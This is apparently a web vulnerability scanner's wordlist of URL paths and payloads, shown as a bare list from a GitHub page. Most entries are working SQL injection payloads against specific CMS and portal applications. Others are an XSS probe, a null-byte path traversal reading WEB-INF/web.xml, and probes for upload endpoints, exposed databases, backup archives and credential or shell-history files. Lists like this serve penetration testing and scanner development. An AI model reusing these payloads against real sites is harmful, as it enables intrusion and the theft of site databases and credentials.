/cctrl/admin/news/contShow.php?id=2'%20and%20(select%201%20from%20%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%23
/cctrl/backup/index.php
/cctrl/admin/purview/purview.php
/data_Xbaby/gdjm133950.mdb
/admin/message_der.asp?id=7%20union%20select%201,chr(97),chr(106),4,5%20from%20admin
/admin/fuwu_der.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/admin/fuwu_modi.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/admin/upfile.asp
/admin/upfile_yqhy.asp
/FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=-1%20AND%201=(SELECT%20CHAR(106)%2bCHAR(67))%20--
/FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=30000&VideoID=105%20and%201=(SELECT%20CHAR(86)%2bCHAR(105))
/FWeb/WorkRoomWeb/Web/TeacherCourse.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
/FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
/FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=101%20AND%201=(SELECT%20CHAR(106)%2bCHAR(79))&diaryID=1
/VIEWGOOD/ADI/portal/UserDataSync.aspx
/SPM/Pc/Content/Request.aspx?action=name_check
/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1'%20AND%20(SELECT%20CHAR(86))%3E0--&AssetID=1&CaptionName=1
/adksvod/PublicFolder/AuthorVideo.aspx?AuthorID=-4448%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/App_Site/SiteSearch.aspx?Title=1'%20AND%20(SELECT%20CHAR(58)%2bCHAR(85))%3E1%20--
/adksvod/PublicFolder/ShareVideoList.aspx?TagID=-1406%25%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/adksvod/PublicFolder/VideoList.aspx?userid=1&TagID=101%25%27%20AND%202358%3DCONVERT%28INT%2C%28CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29%29%29%20--&type=catalog&level=3
/ismservice/jsp/billQueryPage.jsp?entercode=3%22%3C/script%3E%3Cscript%3Eprompt(42873);%3C/script%3E//
/admin/include/del.asp?tableName=feedback&pk=id&pkValue=IIF(iamnotfunction(),1,0)
/include/upload.asp
/TownsWeb/PageModule/MessageInfoList.aspx?MediaID=1'%20AND%201=CHAR(108)%20--
/TownsWeb/PageModule/MessageInfoSender.aspx?msgID=1'%20AND%201=CHAR(107)%20--
/Duty/write/FileType.aspx?hideBtn=1&ID=1'%20and%201=char(86)%20--
/WarnMaintence/AJaxHandler/UpdateSortNo.ashx?fnName=1&DeptCd=1&SortNo=(select%20char(86)%2bchar(95))
/WarnMaintence/SelectContacts.aspx?fnName=UpdateContact&selectedNodes=1&contactDeptCD=(select%20char(88)%2bchar(95))
/Warn/AjaxHandle/AjaxDeleteMsgInfo.ashx?action=DeleteMsg&msgid=(CONVERT(INT,(SELECT%20CHAR(99)%2bCHAR(86)%2bCHAR(94)%2bCHAR(101)%2bCHAR(93))))
/Map/AjaxHandler/AjaxMapCustomAction.ashx?action=GetParamVal&param=FaxUrl'%20and%202=(select%20char(118))%20--&dateForAjax=417
/products.asp
/App_Site/SiteTag.aspx?Tag=1'%20and%20char(106)=1%20--
/product_view.asp
/system/database/data.mdb
/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=/
/manage/CHKLOGIN.ASP
/Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1%20and%201=(select%20char(96)%2bchar(98))&asid=321001
/Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1&asid=1001%20and%201=(select%20char(76)%2bchar(98))
/search.asp
/onlineApply.do?method=initQlxm&depNo=321'%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=21')%20and%203=char(109)%20--&stationType='KKK','ZZ','PP','RR'&StationChooseType=Single&ReportID=Report16
/db1/%23kepu.mdb
/upfile.asp
/upfile2.asp
/upfile3.asp
/data/xinfang.mdb
/VIEWGOOD/WebMedia/search.aspx?key=0&searchCondition=1')%20AND%201=(SELECT%20CHAR(106))%20--&rnd=0.85
/gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00&gw_title=%00
/Duty/MailList/ContactUpdate.aspx?ReadOnly=&UnitID=1&ContactID=-1+and+1=(SELECT%20CHAR(106))
/WS/WebServiceBase.asmx/GetXMLList
/WS/WebService.asmx/GetFile
/WS/WebService.asmx/GetFileContent
/WS/WebService.asmx
/bos/desktop/ajax/EcAjax.aspx
/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=%27%2b+(select+convert(int%2c(CHAR(106)%2bCHAR(79)))+FROM+syscolumns)+%2b%27
/Factory/AjaxGetCSDM.aspx?CSDM=TEST'%20AND%201=CHAR(106)%20--&a=1.1
/ldhyhd.do?theAction=edit_bzOne&id=1'%20UNION%20ALL%20SELECT%20NULL,CHR(113)%7C%7CCHR(120)%7C%7CCHR(105)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(115)%7C%7CCHR(78)%7C%7CCHR(65)%7C%7CCHR(108)%7C%7CCHR(70)%7C%7CCHR(71)%7C%7CCHR(103)%7C%7CCHR(98)%7C%7CCHR(120)%7C%7CCHR(75)%7C%7CCHR(113)%7C%7CCHR(114)%7C%7CCHR(109)%7C%7CCHR(108)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/model/twogradepage/listSend.aspx?appid=1%20AND%20CHAR(106)=1
/interface/ipsconnect/ipsconnect.php
/templates/
/service/local/outreach/welcome/nexusSpaces.css
/phpRedisAdmin/?overview
/?overview
/index.html#/dashboard/file/logstash.json
/index.php/weblinks-categories?id=just_test
/index.php/admin/?case=archive&act=respond&code=alipay&trade_status=WAIT_SELLER_SEND_GOODS
/index.php?m=Article&a=showByUname&uname=%2527or%25201%253D%2528select%25201%2520from%2520%2528select%2520count%2528%252a%2529%252Cconcat%2528floor%2528rand%25280%2529%252a2%2529%252C%2528select%2520md5%25281122%2529%2520from%2520fanwe_admin%2520limit%25200%252C1%2529%2529a%2520from%2520information_schema.tables%2520group%2520by%2520a%2529b%2529%2523
/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media
/index.php?c=api&a=down&file=YWQ2OVpRcGJtL3d3NWh5WmVxbkNYbGRnZjVnalFLSXRaWkRpT1dVZmNXQ1BqNjhPeE82RkpKak1iWUZwcDZrK2tXaFZYdTRZ
/share.php?F_email=test@vul.org%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/test
/oxoxoxoxoxoxox.com
/oxoxoxoxoxoxox.com/
/api/xmlrpc
/wwwroot.rar
/wwwroot.zip
/wwwroot.tar.gz
/web.rar
/www.rar
/www.zip
/www.tar.gz
/web.zip
/crossdomain.xml
/webscan_test.txt
/phpinfo.php
/info.php
/test.php
/shop.php?ac=view&shopid=1-cfreer
/wp-includes/registration-functions.php
/wp-includes/registration.php
/NOEXICT.php?A%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23
/pass.txt
/passwd
/password.txt
/passwords.txt
/users.txt
/users.ini
/admin.cfg
/install.log
/database.inc
/common.inc
/db.inc
/connect.inc
/conn.inc
/sql.inc
/.bash_history
/.bashrc
/Web.config
/Global.asax
/Global.asa
/Global.asax.cs
/data.mdb
/domcfg.nsf
/names.nsf
/log.nsf
/domlog.nsf
/.rediscli_history
/data/%23data.mdb
/config.inc.php.bak
/config/config_ucenter.php.bak
/config/config_global.php.bak
/uc_server/data/config.inc.php.bak
/data/common.inc.php.bak
/wp-config.php.bak
/WEB-INF/database.properties
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment